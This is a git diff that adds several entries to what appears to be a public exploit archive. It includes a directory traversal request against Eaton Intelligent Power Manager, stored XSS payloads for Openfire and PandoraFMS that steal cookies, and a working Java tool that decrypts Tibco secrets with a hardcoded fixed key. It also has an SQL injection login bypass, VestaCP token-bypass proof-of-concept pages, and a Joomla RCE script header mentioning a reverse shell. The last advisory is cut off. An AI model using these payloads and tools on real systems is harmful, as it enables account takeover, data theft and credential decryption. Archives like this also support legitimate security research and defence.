diff --git a/exploits/hardware/webapps/48614.txt b/exploits/hardware/webapps/48614.txt
new file mode 100644
index 000000000..717c037e3
--- /dev/null
+++ b/exploits/hardware/webapps/48614.txt
@@ -0,0 +1,28 @@
+# Exploit Title: Eaton Intelligent Power Manager 1.6 - Directory Traversal
+# Date: 2018-09-29
+# Exploit Author: Emre ÖVÜNÇ
+# Vendor Homepage: https://powerquality.eaton.com/
+# Software Link: https://powerquality.eaton.com/Support/Software-Drivers/default.asp?cx=-999
+# Version: v1.6
+# Tested on: Windows
+
+# CVE-2018-12031
+# https://nvd.nist.gov/vuln/detail/CVE-2018-12031
+# https://github.com/EmreOvunc/Eaton-Intelligent-Power-Manager-Local-File-Inclusion
+
+# PoC
+To exploit vulnerability, someone could use
+'https://[HOST]/server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../'
+request to get some informations from the target.
+
+GET /server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../windows/System32/drivers/etc/host
+HTTP/1.1
+Host: [TARGET]
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:60.0)
+Gecko/20100101 Firefox/60.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+DNT: 1
+Connection: close
+Upgrade-Insecure-Requests: 1
\ No newline at end of file
diff --git a/exploits/jsp/webapps/49229.txt b/exploits/jsp/webapps/49229.txt
new file mode 100644
index 000000000..d116f4be6
--- /dev/null
+++ b/exploits/jsp/webapps/49229.txt
@@ -0,0 +1,27 @@
+# Exploit Title: Openfire 4.6.0 - 'path' Stored XSS
+# Date: 20201209
+# Exploit Author: j5s
+# Vendor Homepage: https://github.com/igniterealtime/Openfire
+# Software Link: https://www.igniterealtime.org/downloads/
+# Version: 4.6.0
+
+POST /plugins/nodejs/nodejs.jsp HTTP/1.1
+Host: 192.168.137.137:9090
+User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101
+Firefox/68.0
+Content-Length: 60
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Content-Type: application/x-www-form-urlencoded
+Cookie: JSESSIONID=node087pcmtxo1yry1fzb5tlt5bz4c19.node0;
+csrf=dWiihlZamEAB0mrO; DWRSESSIONID=oWZp3ax5c9EpPgMNZv4T4BASYrwhhv3K8pn;
+jiveforums.admin.logviewer=debug.size=0&all.size=524269&warn.size=856459&error.size=0&info.size=145819
+Origin: http://192.168.137.137:9090
+Referer: http://192.168.137.137:9090/plugins/nodejs/nodejs.jsp
+Upgrade-Insecure-Requests: 1
+Accept-Encoding: gzip
+
+path=%22%3E%3CScRiPt%3Eaozunukfyd%3C%2FsCrIpT%3E&update=Save
+
+payload："><ScRiPt>alert(document.cookie)</ScRiPt>
\ No newline at end of file
diff --git a/exploits/multiple/local/49221.java b/exploits/multiple/local/49221.java
new file mode 100644
index 000000000..949b25bfa
--- /dev/null
+++ b/exploits/multiple/local/49221.java
@@ -0,0 +1,136 @@
+# Exploit Title: Tibco ObfuscationEngine 5.11 - Fixed Key Password Decryption
+# Date: December 8th 2020
+# Exploit Author: Tess Sluijter
+# Vendor Homepage: https://www.tibco.com
+# Version: 5.11x and before
+# Tested on: MacOS, Linux, Windows
+
+# Tibco password decryption exploit
+
+## Background
+
+Tibco's documentation states that there are three modes of operation for this ObfuscationEngine tooling:
+
+1. Using a custom key.
+2. Using a machine key.
+3. Using a fixed key.
+
+https://docs.tibco.com/pub/runtime_agent/5.11.1/doc/pdf/TIB_TRA_5.11.1_installation.pdf?id=2
+
+This write-up pertains to #3 above. 
+Secrets obfuscated using the Tibco fixed key can be recognized by the fact that they start with the characters #!. For example: "#!oe2FVz/rcjokKW2hIDGE7nSX1U+VKRjA".
+
+## Issues
+
+On Tibco's forums, but also on other websites, people have already shared Java code to decrypt secrets encrypted with this fixed key. For example:
+
+* https://support.tibco.com/s/article/Tibco-KnowledgeArticle-Article-30338
+* https://community.tibco.com/questions/password-encryptiondecryption
+* https://community.tibco.com/questions/deobfuscatedecrypt-namevaluepairpassword-gv-file
+* https://community.tibco.com/questions/bw6-password-decrypt
+* http://tibcoworldin.blogspot.com/2012/08/decrypting-password-data-type-global.html
+* http://tibcoshell.blogspot.com/2016/07/how-to-decrypt-encryptedmasked-password.html
+
+## Impact
+
+Regardless of country, customer, network or version of Tibco, any secret that was obfuscated with Tibco's ObfuscationEngine can be decrypted using my Java tool. It does **not** require access to Tibco software or libraries. All you need are exfiltrated secret strings that start with the characters #!. This is not going to be fixed by Tibco, this is a design decision also used for backwards compatibility in their software.
+
+## Instructions
+
+Compile with:
+
+javac decrypt.java
+
+Examples of running, with secrets retrieved from websites and forums:
+
+java Decrypt oe2FVz/rcjokKW2hIDGE7nSX1U+VKRjA
+7474
+
+java Decrypt BFBiFqp/qhvyxrTdjGtf/9qxlPCouNSP
+tibco
+
+/* comments!
+Compile with: 
+		javac decrypt.java
+		
+Run as:
+		java Decrypt oe2FVz/rcjokKW2hIDGE7nSX1U+VKRjA
+		7474
+		
+		java Decrypt BFBiFqp/qhvyxrTdjGtf/9qxlPCouNSP
+		tibco
+ */
+
+import java.io.ByteArrayInputStream;
+import java.util.Arrays;
+import java.util.Base64;
+import javax.crypto.Cipher;
+import javax.crypto.SecretKey;
+import javax.crypto.spec.SecretKeySpec;
+import javax.crypto.spec.IvParameterSpec;
+import javax.crypto.CipherInputStream;
+import javax.crypto.CipherOutputStream;
+
+
+class Decrypt
+{
+	public static void main (String [] arguments)
+	{
+		try
+		{
+			byte[] keyBytes = { 28, -89, -101, -111, 91, -113, 26, -70, 98, -80, -23, -53, -118, 93, -83, -17, 28, -89, -101, -111, 91, -113, 26, -70 };
+	
+			String algo = "DESede/CBC/PKCS5Padding";
+		
+			String encryptedText = arguments[0];
+			byte[] message = Base64.getDecoder().decode(encryptedText);
+
+			ByteArrayInputStream byteArrayInputStream = new ByteArrayInputStream(message);
+	
+			Cipher decipher = Cipher.getInstance(algo);
+
+			int i = decipher.getBlockSize();
+			byte[] ivSetup = new byte[i];
+			byteArrayInputStream.read(ivSetup);
+
+			SecretKey key = new SecretKeySpec(keyBytes, 0, keyBytes.length, "DESede");
+	  
+			decipher.init(2, key, new IvParameterSpec(ivSetup));
+	
+			// Magic, I admit I don't understand why this is needed.
+			CipherInputStream cipherInputStream = new CipherInputStream(byteArrayInputStream, decipher);
+			char[] plaintext;
+			char[] arrayOfChar1 = new char[(message.length - i) / 2];
+			byte[] arrayOfByte4 = new byte[2];
+			byte b = 0;
+
+			while (2 == cipherInputStream.read(arrayOfByte4, 0, 2)) {
+				arrayOfChar1[b++] = (char)((char)arrayOfByte4[1] << '\b' | (char)arrayOfByte4[0]);
+			}
+			
+			cipherInputStream.close();
+  
+			if (b == arrayOfChar1.length) {
+				plaintext = arrayOfChar1;
+			} else {
+				char[] arrayOfChar = new char[b];
+				System.arraycopy(arrayOfChar1, 0, arrayOfChar, 0, b);
+				for (b = 0; b < arrayOfChar1.length; b++) {
+				arrayOfChar1[b] = Character.MIN_VALUE;
+				}
+
+				plaintext = arrayOfChar;
+				// End of Magic
+			} 
+  
+			System.out.println(plaintext);
+
+		}
+
+		catch (Exception ex)
+		{
+			System.out.println("Barf...");
+			System.out.println(ex);
+		}
+	}
+}
\ No newline at end of file
diff --git a/exploits/multiple/webapps/49165.txt b/exploits/multiple/webapps/49165.txt
new file mode 100644
index 000000000..95aaa00d5
--- /dev/null
+++ b/exploits/multiple/webapps/49165.txt
@@ -0,0 +1,20 @@
+# Exploit Title: Employee Record Management System 1.1 - Login Bypass SQL Injection
+# Date: 2020–11–17
+# Exploit Author: Anurag Kumar Rawat(A1C3VENOM)
+# Vendor Homepage: https://phpgurukul.com
+# Software Link: https://phpgurukul.com/employee-record-management-system-in-php-and-mysql/
+# Version: 1.1
+# Tested on Parrot os(Linux)
+
+Attack Vector:
+An attacker can gain admin panel access using malicious sql injection quiries.
+
+Steps to reproduce:
+1. Open admin login page using following URl:
+-> http://localhost/erms/admin/index.php
+
+2. Now put below Payload in both the fields( User ID & Password)
+Payload: ' or '1'='1
+
+3)Server accept this payload and attacker successfully bypassed admin panel
+without any credentials
\ No newline at end of file
diff --git a/exploits/multiple/webapps/49219.txt b/exploits/multiple/webapps/49219.txt
new file mode 100644
index 000000000..4276cdfa2
--- /dev/null
+++ b/exploits/multiple/webapps/49219.txt
@@ -0,0 +1,313 @@
+# Exploit Title: VestaCP 0.9.8-26 - 'LoginAs' Insufficient Session Validation
+# Date: 2020-11-26
+# Exploit Author: Vulnerability-Lab
+# Vendor Homepage: https://vestacp.com/
+# Software Link: https://vestacp.com/install/
+# Version: 0.9.8-26
+
+Document Title:
+===============
+VestaCP v0.9.8-26 - (LoginAs) Token Session Vulnerability
+
+
+References (Source):
+====================
+https://www.vulnerability-lab.com/get_content.php?id=2240
+
+
+Release Date:
+=============
+2020-11-26
+
+
+Vulnerability Laboratory ID (VL-ID):
+====================================
+2240
+
+
+Common Vulnerability Scoring System:
+====================================
+8.3
+
+
+Vulnerability Class:
+====================
+Insufficient Session Validation
+
+
+Current Estimated Price:
+========================
+2.000€ - 3.000€
+
+
+Product & Service Introduction:
+===============================
+Web interface is open source php and javascript interface based on Vesta
+open API, it uses 381 vesta CLI calls.
+The GNU General Public Licence is a free, copyleft licence for software
+and other kinds of works. Its free to change,
+modify and redistribute source code.
+
+(Copy of the Homepage: https://vestacp.com/features/ &
+https://vestacp.com/install/ )
+
+
+Abstract Advisory Information:
+==============================
+The vulnerability laboratory core research team discovered a
+insufficient session validation vulnerability in the VestaCP v0.9.8-26
+hosting web-application.
+
+
+Affected Product(s):
+====================
+Vesta
+Product: VestaCP v0.9.8-26 - Hosting Control Panel (Web-Application)
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2020-05-04: Researcher Notification & Coordination (Security Researcher)
+2020-05-05: Vendor Notification (Security Department)
+2020-05-07: Vendor Response/Feedback (Security Department)
+2020-**-**: Vendor Fix/Patch (Service Developer Team)
+2020-**-**: Security Acknowledgements (Security Department)
+2020-11-26: Public Disclosure (Vulnerability Laboratory)
+
+
+Discovery Status:
+=================
+Published
+
+
+Exploitation Technique:
+=======================
+Remote
+
+
+Severity Level:
+===============
+High
+
+
+Authentication Type:
+====================
+Pre Auth (No Privileges or Session)
+
+
+User Interaction:
+=================
+No User Interaction
+
+
+Disclosure Type:
+================
+Full Disclosure
+
+
+Technical Details & Description:
+================================
+A session token vulnerability has been discovered in the official
+VestaCP (Control Panel) v0.9.8-26 hosting web-application.
+The vulnerability allows remote attackers to gain unauthenticated or
+unauthorized access by client-side token manipulation.
+
+The token vulnerability is located in the function of the `LoginAs`
+module. Remote attackers are able to perform LoginAs requests
+without session token to preview there profiles. The attack requires
+user account privileges for manipulation of the request.
+The admin panel allows to request via token the local user accounts to
+login as via account switch. In that moment the token
+of the request can be removed to perform the same interaction with user
+privileges. Thus allows to access other account
+information without administrative permissions. The permission approval
+on login request is insufficient regarding a
+misconfiguration on the token implementation (client-side).
+
+Successful exploitation of the web vulnerability results in information
+disclosure, user or admin account compromise and
+elevation of privileges by further exploitation.
+
+Request Method(s):
+[+] GET
+
+Vulnerable Module(s):
+[+] /login/
+
+Vulnerable Parameter(s):
+[+] token
+
+Affected Parameter(s):
+[+] loginas
+
+
+Proof of Concept (PoC):
+=======================
+The token web vulnerability can be exploited by remote attackers with
+simple user privileges without user interaction.
+For security demonstration or to reproduce the vulnerability follow the
+provided information and steps below to continue.
+
+
+Request: Default (Download Backup)
+https://vestacp.localhost:8083/login/?loginas=user&token=f230a989082eec102ad5a3bb81fd0190
+https://vestacp.localhost:8083/login/?loginas=admin&token=f230a989082eec102ad5a3bb81fd0190
+
+
+PoC: Exploitation
+https://vestacp.localhost:8083/login/?loginas=user/.admin&token=null
+
+
+PoC: Exploit
+<html>
+<head><body>
+<title>VestaCP (Control Panel) v0.9.8-26 - LoginAs User/Admin PoC</title>
+<iframe
+src="https://vestacp.localhost:8083/login/?loginas=admin&token=null"%20>
+</body></head>
+<html>
+
+
+
+--- PoC Session Logs [GET] ---
+https://vestacp.localhost:8083/login/?loginas=[ACCOUNTNAME]&token=null
+Host: vestacp.localhost:8083
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Connection: keep-alive
+Referer: https://vestacp.localhost:8083/list/user/
+Cookie: __utma=80953744.319544562.1588324200.1588338964.1588341255.6;
+__utmc=80953744;
+__utmz=80953744.1588333371.4.4.utmcsr=demo.vestacp.com|utmccn=(referral)|utmcmd=referral|utmcct=/;
+
+_ym_uid=1588324200958108010; _ym_d=1588324200; _ym_isad=2;
+PHPSESSID=7u5ilka7amc64ue6htfipljha7; hide_passwords=0;
+__utmb=80953744.5.10.1588341255; _ym_visorc_34956065=w; __utmt=1;
+metrika_enabled=1; _ym_metrika_enabled=1; _ym_metrika_enabled_34956065=1
+-
+GET: HTTP/1.1 302 Moved Temporarily
+Server: nginx
+Content-Type: text/html; charset=UTF-8
+Transfer-Encoding: chunked
+Connection: keep-alive
+Keep-Alive: timeout=120
+Location: /
+-
+https://vestacp.localhost:8083/
+Host: vestacp.localhost:8083
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Referer: https://vestacp.localhost:8083/list/user/
+Connection: keep-alive
+Cookie: __utma=80953744.319544562.1588324200.1588338964.1588341255.6;
+__utmc=80953744;
+__utmz=80953744.1588333371.4.4.utmcsr=demo.vestacp.com|utmccn=(referral)|utmcmd=referral|utmcct=/;
+
+_ym_uid=1588324200958108010; _ym_d=1588324200; _ym_isad=2;
+PHPSESSID=7u5ilka7amc64ue6htfipljha7; hide_passwords=0;
+__utmb=80953744.5.10.1588341255; _ym_visorc_34956065=w; __utmt=1;
+metrika_enabled=1; _ym_metrika_enabled=1; _ym_metrika_enabled_34956065=1
+-
+GET: HTTP/1.1 302 Moved Temporarily
+Server: nginx
+Content-Type: text/html; charset=UTF-8
+Transfer-Encoding: chunked
+Connection: keep-alive
+Keep-Alive: timeout=120
+-
+Location: /list/user/
+https://vestacp.localhost:8083/list/user/
+Host: vestacp.localhost:8083
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Referer: https://vestacp.localhost:8083/list/user/
+Connection: keep-alive
+Cookie: __utma=80953744.319544562.1588324200.1588338964.1588341255.6;
+__utmc=80953744;
+__utmz=80953744.1588333371.4.4.utmcsr=demo.vestacp.com|utmccn=(referral)|utmcmd=referral|utmcct=/;
+
+_ym_uid=1588324200958108010; _ym_d=1588324200; _ym_isad=2;
+PHPSESSID=7u5ilka7amc64ue6htfipljha7; hide_passwords=0;
+__utmb=80953744.5.10.1588341255; _ym_visorc_34956065=w; __utmt=1;
+metrika_enabled=1; _ym_metrika_enabled=1; _ym_metrika_enabled_34956065=1
+-
+GET: HTTP/1.1 200 OK
+Server: nginx
+Content-Type: text/html; charset=UTF-8
+Transfer-Encoding: chunked
+Connection: keep-alive
+Keep-Alive: timeout=120
+Content-Encoding: gzip
+-
+Welcome - Logged in as user admin
+
+
+Reference(s):
+https://vestacp.localhost:8083/
+https://vestacp.localhost:8083/login/
+https://vestacp.localhost:8083/login/?loginas
+https://vestacp.localhost:8083/list/user/
+
+
+Security Risk:
+==============
+The security risk of the remote session vulnerability in the vestacp
+application is estimated as high.
+
+
+Credits & Authors:
+==================
+Vulnerability-Lab -
+https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
+Benjamin Kunz Mejri -
+https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.
+
+
+
+Disclaimer & Information:
+=========================
+The information provided in this advisory is provided as it is without
+any warranty. Vulnerability Lab disclaims all warranties,
+either expressed or implied, including the warranties of merchantability
+and capability for a particular purpose. Vulnerability-Lab
+or its suppliers are not liable in any case of damage, including direct,
+indirect, incidental, consequential loss of business profits
+or special damages, even if Vulnerability-Lab or its suppliers have been
+advised of the possibility of such damages. Some states do
+not allow the exclusion or limitation of liability for consequential or
+incidental damages so the foregoing limitation may not apply.
+We do not approve or encourage anybody to break any licenses, policies,
+deface websites, hack into databases or trade with stolen data.
+
+Domains:    www.vulnerability-lab.com		www.vuln-lab.com			
+www.vulnerability-db.com
+Services:   magazine.vulnerability-lab.com
+paste.vulnerability-db.com 			infosec.vulnerability-db.com
+Social:	    twitter.com/vuln_lab		facebook.com/VulnerabilityLab 		
+youtube.com/user/vulnerability0lab
+Feeds:	    vulnerability-lab.com/rss/rss.php
+vulnerability-lab.com/rss/rss_upcoming.php
+vulnerability-lab.com/rss/rss_news.php
+Programs:   vulnerability-lab.com/submit.php
+vulnerability-lab.com/register.php
+vulnerability-lab.com/list-of-bug-bounty-programs.php
+
+Any modified copy or reproduction, including partially usages, of this
+file requires authorization from Vulnerability Laboratory.
+Permission to electronically redistribute this alert in its unmodified
+form is granted. All other rights, including the use of other
+media, are reserved by Vulnerability-Lab Research Team or its suppliers.
+All pictures, texts, advisories, source code, videos and other
+information on this website is trademark of vulnerability-lab team & the
+specific authors or managers. To record, list, modify, use or
+edit our material contact (admin@ or research@) to get a ask permission.
+
+				    Copyright © 2020 | Vulnerability Laboratory - [Evolution
+Security GmbH]™
+
+
+
+
+-- 
+VULNERABILITY LABORATORY - RESEARCH TEAM
+SERVICE: www.vulnerability-lab.com
\ No newline at end of file
diff --git a/exploits/multiple/webapps/49220.txt b/exploits/multiple/webapps/49220.txt
new file mode 100644
index 000000000..589b4ba3d
--- /dev/null
+++ b/exploits/multiple/webapps/49220.txt
@@ -0,0 +1,258 @@
+# Exploit Title: VestaCP 0.9.8-26 - 'backup' Information Disclosure
+# Date: 2020-11-25
+# Exploit Author: Vulnerability-Lab
+# Vendor Homepage: https://vestacp.com/
+# Software Link: https://vestacp.com/install/
+# Version: 0.9.8-26
+
+Document Title:
+===============
+VestaCP v0.9.8-26 - Insufficient Session Validation Web Vulnerability
+
+
+References (Source):
+====================
+https://www.vulnerability-lab.com/get_content.php?id=2238
+
+
+Release Date:
+=============
+2020-11-25
+
+
+Vulnerability Laboratory ID (VL-ID):
+====================================
+2238
+
+
+Common Vulnerability Scoring System:
+====================================
+7
+
+
+Vulnerability Class:
+====================
+Insufficient Session Validation
+
+
+Current Estimated Price:
+========================
+1.000€ - 2.000€
+
+
+Product & Service Introduction:
+===============================
+Web interface is open source php and javascript interface based on Vesta
+open API, it uses 381 vesta CLI calls.
+The GNU General Public Licence is a free, copyleft licence for software
+and other kinds of works. Its free to change,
+modify and redistribute source code.
+
+(Copy of the Homepage: https://vestacp.com/features/ &
+https://vestacp.com/install/ )
+
+
+Abstract Advisory Information:
+==============================
+The vulnerability laboratory core research team discovered a
+insufficient session validation vulnerability in the VestaCP v0.9.8-26
+hosting web-application.
+
+
+Affected Product(s):
+====================
+Vesta
+Product: VestaCP v0.9.8-26 - Hosting Control Panel (Web-Application)
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2020-05-04: Researcher Notification & Coordination (Security Researcher)
+2020-05-05: Vendor Notification (Security Department)
+2020-05-07: Vendor Response/Feedback (Security Department)
+2020-**-**: Vendor Fix/Patch (Service Developer Team)
+2020-**-**: Security Acknowledgements (Security Department)
+2020-11-25: Public Disclosure (Vulnerability Laboratory)
+
+
+
+Discovery Status:
+=================
+Published
+
+
+Exploitation Technique:
+=======================
+Remote
+
+
+Severity Level:
+===============
+High
+
+
+Authentication Type:
+====================
+Restricted Authentication (Guest Privileges)
+
+
+User Interaction:
+=================
+No User Interaction
+
+
+Disclosure Type:
+================
+Full Disclosure
+
+
+Technical Details & Description:
+================================
+An insufficient session validation vulnerability has been discovered in
+the official VestaCP (Control Panel) v0.9.8-26 hosting web-application.
+The vulnerability allows remote attackers to gain sensitive
+web-application data or information without permission, authentication
+or authorization.
+
+The backup url includes a token parameter for the download request on
+backups. The mechanism is to secure that other users can only download the
+backup with the token to confirm the permission. The token is not
+required for the download and can be deattached in the client-side
+session request.
+The session validation of the backup download request is insufficient
+validating the request without token parameter approval. Next to that
+the backup
+uses the name of the privileges in combination with the date in a tar
+compressed folder. Thus allows a remote attacker with low user
+privileges to
+download the backup data without permission.
+
+Successful exploitation of the session web vulnerability results in
+information disclosure of the local application and dbms backup files.
+
+Request Method(s):
+[+] GET
+
+Vulnerable Module(s):
+[+] /download/backup/
+
+Vulnerable Parameter(s):
+[+] token
+
+Affected Parameter(s):
+[+] backup
+
+
+Proof of Concept (PoC):
+=======================
+The insufficient session validation vulnerability can be exploited by
+remote attackers with simple user privileges without user interaction.
+For security demonstration or to reproduce the information disclosure
+issue follow the provided information and steps below to continue.
+
+
+Request: Default (Download Backup)
+https://vestacp.localhost:8083/download/backup/?backup=user.2020-04-28_00-00-17.tar&token=d6f4a3a923ab5c60ef0a52995245a3d4
+https://vestacp.localhost:8083/download/backup/?backup=admin.2020-04-28_00-00-17.tar&token=d6f4a3a923ab5c60ef0a52995245a3d4
+
+
+PoC: Exploitation
+https://vestacp.localhost:8083/download/backup/?backup=[USER/ADMIN].[YYYY-MM-DD_HH-MM-SS].tar
+https://vestacp.localhost:8083/download/backup/?backup=user.2020-04-28_00-00-17.tar
+https://vestacp.localhost:8083/download/backup/?backup=admin.2020-04-28_00-00-17.tar
+
+
+PoC: Exploit
+<html>
+<head><body>
+<title>VestaCP (Control Panel) v0.9.8-26 - Information Disclosure
+(Backup)</title>
+<iframe
+src=https://vestacp.localhost:8083/download/backup/?backup=[USER/ADMIN].[YYYY-MM-DD_HH-MM-SS].tar>
+</body></head>
+<html>
+
+
+--- PoC Session Logs [GET] ---
+https://vestacp.localhost:8083/download/backup/?backup=user.2020-**-**_00-00-17.tar
+Host: vestacp.localhost:8083
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Encoding: gzip, deflate, br
+Connection: keep-alive
+Cookie: PHPSESSID=4neq25hga91vqrf4maktd4q073;
+-
+GET: HTTP/1.1 200 OK
+Server: nginx
+Content-Type: application/gzip
+Content-Length: 3891200
+Connection: keep-alive
+Content-Disposition: attachment; filename="user.2020-**-**_00-00-17.tar";
+Accept-Ranges: bytes
+
+
+Reference(s):
+https://vestacp.localhost:8083/
+https://vestacp.localhost:8083/download/
+https://vestacp.localhost:8083/download/backup/
+https://vestacp.localhost:8083/download/backup/?backup
+
+
+Security Risk:
+==============
+The security risk of the session validation web vulnerability in the
+vestacp web-application is estimated as high.
+
+
+Credits & Authors:
+==================
+Vulnerability-Lab -
+https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
+Benjamin Kunz Mejri -
+https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.
+
+
+Disclaimer & Information:
+=========================
+The information provided in this advisory is provided as it is without
+any warranty. Vulnerability Lab disclaims all warranties,
+either expressed or implied, including the warranties of merchantability
+and capability for a particular purpose. Vulnerability-Lab
+or its suppliers are not liable in any case of damage, including direct,
+indirect, incidental, consequential loss of business profits
+or special damages, even if Vulnerability-Lab or its suppliers have been
+advised of the possibility of such damages. Some states do
+not allow the exclusion or limitation of liability for consequential or
+incidental damages so the foregoing limitation may not apply.
+We do not approve or encourage anybody to break any licenses, policies,
+deface websites, hack into databases or trade with stolen data.
+
+Domains:    www.vulnerability-lab.com		www.vuln-lab.com			
+www.vulnerability-db.com
+Services:   magazine.vulnerability-lab.com
+paste.vulnerability-db.com 			infosec.vulnerability-db.com
+Social:	    twitter.com/vuln_lab		facebook.com/VulnerabilityLab 		
+youtube.com/user/vulnerability0lab
+Feeds:	    vulnerability-lab.com/rss/rss.php
+vulnerability-lab.com/rss/rss_upcoming.php
+vulnerability-lab.com/rss/rss_news.php
+Programs:   vulnerability-lab.com/submit.php
+vulnerability-lab.com/register.php
+vulnerability-lab.com/list-of-bug-bounty-programs.php
+
+Any modified copy or reproduction, including partially usages, of this
+file requires authorization from Vulnerability Laboratory.
+Permission to electronically redistribute this alert in its unmodified
+form is granted. All other rights, including the use of other
+media, are reserved by Vulnerability-Lab Research Team or its suppliers.
+All pictures, texts, advisories, source code, videos and other
+information on this website is trademark of vulnerability-lab team & the
+specific authors or managers. To record, list, modify, use or
+edit our material contact (admin@ or research@) to get a ask permission.
+
+				    Copyright © 2020 | Vulnerability Laboratory - [Evolution
+Security GmbH]™
+
+-- 
+VULNERABILITY LABORATORY - RESEARCH TEAM
+SERVICE: www.vulnerability-lab.com
\ No newline at end of file
diff --git a/exploits/php/webapps/39033.py b/exploits/php/webapps/39033.py
index 83c91739a..1095f0049 100755
--- a/exploits/php/webapps/39033.py
+++ b/exploits/php/webapps/39033.py
@@ -1,17 +1,17 @@
 #!/usr/bin/env python
 
-# Exploit Title: Joomla 1.5 - 3.4.5 Object Injection RCE X-Forwarded-For header
+# Exploit Title: Joomla 1.5 - 3.4.6 Object Injection RCE X-Forwarded-For header
 # Date: 12/17/2015
 # Exploit Author: original - Gary@ Sec-1 ltd, Modified - Andrew McNicol BreakPoint Labs (@0xcc_labs)
 # Vendor Homepage: https://www.joomla.org/
 # Software Link: http://joomlacode.org/gf/project/joomla/frs/
-# Version: Joomla 1.5 - 3.4.5
+# Version: Joomla 1.5 - 3.4.6
 # Tested on: Ubuntu 14.04.2 LTS (Joomla! 3.2.1 Stable)
 # CVE : CVE-2015-8562
 
 
 '''
-    Joomla 1.5 - 3.4.5 Object Injection RCE - CVE-2015-8562
+    Joomla 1.5 - 3.4.6 Object Injection RCE - CVE-2015-8562
     PoC for CVE-2015-8562 to spawn a reverse shell or automate RCE
 
     Original PoC from Gary@ Sec-1 ltd (http://www.sec-1.com): 
diff --git a/exploits/php/webapps/48700.txt b/exploits/php/webapps/48700.txt
new file mode 100644
index 000000000..5c18b5607
--- /dev/null
+++ b/exploits/php/webapps/48700.txt
@@ -0,0 +1,54 @@
+# Exploit Title: PandoraFMS NG747 7.0 - 'filename' Persistent Cross-Site Scripting
+# Date: 2020-08-20
+# Exploit Author: Emre ÖVÜNÇ
+# Vendor Homepage: https://pandorafms.org/
+# Software Link: https://pandorafms.org/features/free-download-monitoring-software/
+# Version: 7.0NG747
+# Tested on: Windows/Linux/ISO
+
+# Link https://github.com/EmreOvunc/Pandora-FMS-7.0-NG-747-Stored-XSS
+
+# Description
+A stored cross-site scripting (XSS) in Pandora FMS 7.0 NG 747 can result in
+an attacker performing malicious actions to users who open a maliciously
+crafted link or third-party web page. (Workspace >> Issues >> List of
+issues >> Add - Attachment)
+
+# PoC
+
+To exploit vulnerability, someone could use a POST request to
+'/pandora_console/index.php' by manipulating 'filename' parameter in the
+request body to impact users who open a maliciously crafted link or
+third-party web page.
+
+POST /pandora_console/index.php?sec=workspace&sec2=operation/incidents/incident_detail&id=3&upload_file=1
+HTTP/1.1
+Host: [HOST]
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:78.0)
+Gecko/20100101 Firefox/78.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Content-Type: multipart/form-data;
+boundary=---------------------------188134206132629608391758747427
+Content-Length: 524
+DNT: 1
+Connection: close
+Cookie: PHPSESSID=3098fl65su4l237navvq6d5igs
+Upgrade-Insecure-Requests: 1
+
+-----------------------------188134206132629608391758747427
+Content-Disposition: form-data; name="userfile"; filename="\"><svg
+onload=alert(document.cookie)>.png"
+Content-Type: image/png
+
+"><svg onload=alert(1)>
+-----------------------------188134206132629608391758747427
+Content-Disposition: form-data; name="file_description"
+
+desc
+-----------------------------188134206132629608391758747427
+Content-Disposition: form-data; name="upload"
+
+Upload
+-----------------------------188134206132629608391758747427--
\ No newline at end of file
diff --git a/exploits/php/webapps/49064.txt b/exploits/php/webapps/49064.txt
new file mode 100644
index 000000000..4b948e8f8
--- /dev/null
+++ b/exploits/php/webapps/49064.txt
@@ -0,0 +1,316 @@
+# Exploit Title: Joomla Plugin Simple Image Gallery Extended (SIGE) 3.5.3 - Multiple Vulnerabilities
+# Exploit Author: Vulnerability-Lab
+# Date: 2020-11-11
+# Vendor Homepage: https://kubik-rubik.de/sige-simple-image-gallery-extended
+# Software Link: https://kubik-rubik.de/sige-simple-image-gallery-extended
+# Version: 3.5.3
+
+Document Title:
+===============
+SIGE (Joomla) 3.4.1 & 3.5.3 Pro - Multiple Vulnerabilities
+
+
+References (Source):
+====================
+https://www.vulnerability-lab.com/get_content.php?id=2265
+
+
+Release Date:
+=============
+2020-11-11
+
+
+Vulnerability Laboratory ID (VL-ID):
+====================================
+2265
+
+
+Common Vulnerability Scoring System:
+====================================
+7.8
+
+
+Vulnerability Class:
+====================
+Multiple
+
+
+Current Estimated Price:
+========================
+2.000€ - 3.000€
+
+
+Product & Service Introduction:
+===============================
+It offers numerous opportunities to present pictures quickly and easily
+in articles. The unique feature of the plugin is
+that you can control any parameter on the syntax call. Editor Button -
+SIGE Parameters: With the button, you can set the
+parameters very easy on-the-fly in an article. It is an excellent
+addition to SIGE. Highlights are: parameter call, watermark
+function, read IPTC data, thumbnail storage, crop function, sort by
+modification date, output as a list, CSS Image Tooltip,
+Editor Button SIGE Parameter and much more. In version 1.7-2, SIGE was
+rewritten entirely and equipped with numerous innovations.
+The absolute highlight is the turbo mode. This feature doesn't exist in
+any other plugin for Joomla!. In Turbo Mode 2 text files
+are created from the HTML output of the gallery and loaded in successive
+runs. This feature eliminates the tedious editing
+process of each image. In a test with 50 large images, the creation of a
